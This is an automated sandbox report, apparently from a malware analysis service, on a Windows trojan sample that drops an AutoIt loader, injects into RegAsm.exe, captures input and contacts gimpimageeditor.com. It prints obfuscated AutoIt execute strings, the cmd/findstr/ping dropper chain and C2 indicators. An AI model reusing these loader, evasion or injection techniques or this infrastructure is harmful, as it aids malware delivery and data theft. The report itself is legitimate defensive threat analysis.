Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BF33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00BF33B7
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeMemory allocated: 24C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeMemory allocated: 26C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeMemory allocated: 46C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_6-99113
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comAPI coverage: 4.1 %
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe TID: 5888Thread sleep count: 153 > 30
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe TID: 5888Thread sleep time: -153000s >= -30000s
              Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_00402F3A FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402F3A
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_004033DB GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_004033DB
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3494A GetFileAttributesW,FindFirstFileW,FindClose,6_2_00C3494A
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C34005
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00C3C2FF
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_00C3CD9F
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3CD14 FindFirstFileW,FindClose,6_2_00C3CD14
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C3F5D8
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C3F735
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00C3FA36
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C33CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C33CE2
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BE5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_00BE5D13
              Source: Appartenga.exe.com, 00000008.00000002.2429954439.000000000417B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
              Source: Appartenga.exe.com, 00000006.00000003.2046288433.00000000012C2000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2042438537.00000000012A6000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2041227761.000000000129C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2045392622.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2040431129.000000000125C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2046762429.00000000012C4000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2047418349.000000000136C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2045016597.00000000012B4000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2046889192.000000000134E000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2040082700.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $iWPYDCUWifJqEMu = Execute(REYmrhU("84*117*115*106*111*104*74*116*71*109*112*98*117*41*40*83*79*107*71*78*105*87*119*100*40*42",1)), $bVyYdZvkAsaUzs = 'NATPSTJcUrldVWQDZ':
              Source: Appartenga.exe.com, 00000008.00000003.2420974799.0000000004031000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2421174177.0000000004040000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IWPYDCUWIFJQEMUh
              Source: Appartenga.exe.com, 00000008.00000003.2419544914.000000000171C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2419320742.000000000171A000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2419141655.0000000001711000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2418243144.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2418835029.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2420023064.0000000001749000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $iWPYDCUWifJqEMu = Execute(REYmrhU("84*117*115*106*111*104*74*116*71*109*112*98*117*41*40*83*79*107*71*78*105*87*119*100*40*42",1)), $bVyYdZvkAsaUzs = 'NATPSTJcUrldVWQDZ'IH'%
              Source: Appartenga.exe.com, 00000006.00000003.2050638868.0000000003A4E000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2050890984.0000000003A65000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2051031560.0000000003A65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IWPYDCUWIFJQEMU_
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002BF9000.00000004.00000020.00020000.00000000.sdmp, Chirurgo.adt.0.dr, S.4.drBinary or memory string: $iWPYDCUWifJqEMu = Execute(REYmrhU("84*117*115*106*111*104*74*116*71*109*112*98*117*41*40*83*79*107*71*78*105*87*119*100*40*42",1)), $bVyYdZvkAsaUzs = 'NATPSTJcUrldVWQDZ'
              Source: Appartenga.exe.com, 00000006.00000003.2050638868.0000000003A4E000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2050890984.0000000003A65000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2051031560.0000000003A65000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2420974799.0000000004031000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2421174177.0000000004040000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IWPYDCUWIFJQEMU
              Source: RegAsm.exe, 0000000A.00000002.3266824842.00000000009B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002BF9000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2046288433.00000000012C2000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2042438537.00000000012A6000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2048915181.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2041227761.000000000129C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2045392622.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2040431129.000000000125C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2046762429.00000000012C4000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2047418349.000000000136C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2045016597.00000000012B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $iWPYDCUWifJqEMu = Execute(REYmrhU("74*89*112*102*42*54*55*43",2))
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C445D5 BlockInput,6_2_00C445D5
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_00BE5240
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C05CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,6_2_00C05CAC
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_0040238C LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040238C
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,6_2_00C288CD
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BFA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00BFA385
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BFA354 SetUnhandledExceptionFilter,6_2_00BFA354
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comMemory written: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe base: 720000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comMemory written: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe base: 720000
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comMemory written: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe base: 444000
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C29369 LogonUserW,6_2_00C29369
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_00BE5240
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C31AC6 SendInput,keybd_event,6_2_00C31AC6
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C351E2 mouse_event,6_2_00C351E2
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd < Ideale.adt
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^DzqZaKuCSEcQYFcSDUTCtNHXVpartBbUtTqjUWbpOSHHtRSBbGNtGZbQLrtosenduBMyFpYHvKOjuZSrsQGbOagtclAQSgSLxsADyMWgIuHVkkJLlqRAcq$" San.adt
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com Appartenga.exe.com S
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,6_2_00C288CD
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_0040246B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0040246B
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003273000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000002.2064869478.0000000000C86000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: Appartenga.exe.comBinary or memory string: Shell_TrayWnd
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BF885B cpuid 6_2_00BF885B
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_004021A4
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_0040181E ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_0040181E
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C10722 GetUserNameW,6_2_00C10722
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C0416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,6_2_00C0416A
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_00405782 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00405782
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara matchFile source: 8.3.Appartenga.exe.com.429f508.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.Appartenga.exe.com.429f508.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.RegAsm.exe.720000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Appartenga.exe.com PID: 6688, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1520, type: MEMORYSTR
              Source: Appartenga.exe.comBinary or memory string: WIN_81
              Source: Appartenga.exe.comBinary or memory string: WIN_XP
              Source: Appartenga.exe.comBinary or memory string: WIN_XPe
              Source: Appartenga.exe.comBinary or memory string: WIN_VISTA
              Source: Appartenga.exe.comBinary or memory string: WIN_7
              Source: Appartenga.exe.comBinary or memory string: WIN_8
              Source: San.adt.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

              Remote Access Functionality

              Source: Yara matchFile source: 8.3.Appartenga.exe.com.429f508.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.Appartenga.exe.com.429f508.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.RegAsm.exe.720000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Appartenga.exe.com PID: 6688, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1520, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C4696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,6_2_00C4696E
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C46E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00C46E32
              MITRE ATT&CK Matrix (matched techniques only; the number before each technique is the report's count badge, reproduced as shown; unmatched matrix cells are omitted)

              Reconnaissance: no matched techniques
              Resource Development: no matched techniques
              Initial Access: 2 Valid Accounts
              Execution: 2 Native API; 1 Command and Scripting Interpreter
              Persistence: 1 DLL Side-Loading; 2 Valid Accounts
              Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 212 Process Injection
              Defense Evasion: 11 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Masquerading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 212 Process Injection
              Credential Access: 121 Input Capture
              Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 36 System Information Discovery; 31 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
              Lateral Movement: no matched techniques
              Collection: 1 Archive Collected Data; 121 Input Capture; 3 Clipboard Data
              Command and Control: 1 Ingress Tool Transfer; 1 Encrypted Channel; 2 Non-Application Layer Protocol; 12 Application Layer Protocol
              Exfiltration: no matched techniques
              Impact: 1 System Shutdown/Reboot
              Behavior Graph ID: 1593404  Sample: 2YLM6BQ9S3.exe  Startdate: 17/01/2025  Architecture: WINDOWS  Score: 100
              Domains in graph: gimpimageeditor.com; FUaPHLaTpAPGRbsfxOMdnwBFBsmro.FUaPHLaTpAPGRbsfxOMdnwBFBsmro
              Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures

              Process tree (recovered from the behavior graph):
              2YLM6BQ9S3.exe (started)
                  signature: Contains functionality to register a low level keyboard hook
                  cmd.exe
                      signatures: Obfuscated command line found; Uses ping.exe to sleep; Drops PE files with a suspicious file extension; Uses ping.exe to check the status of other devices and networks
                      conhost.exe
                      cmd.exe
                          dropped: C:\Users\user\AppData\...\Appartenga.exe.com, PE32
                          signatures: Obfuscated command line found; Uses ping.exe to sleep
                          findstr.exe
                          PING.EXE
                              network: 127.0.0.1 unknown unknown
                          Appartenga.exe.com
                              Appartenga.exe.com
                                  dropped: C:\Users\user\AppData\Local\...\RegAsm.exe, PE32
                                  signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
                                  RegAsm.exe
                                      network: gimpimageeditor.com 76.223.67.189, 49857, 80 AMAZON-02US United States

              SourceDetectionScannerLabelLink
              2YLM6BQ9S3.exe58%ReversingLabsWin32.Trojan.Generic
              2YLM6BQ9S3.exe55%VirustotalBrowse
              2YLM6BQ9S3.exe100%AviraTR/Patched.Gen
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com3%ReversingLabs
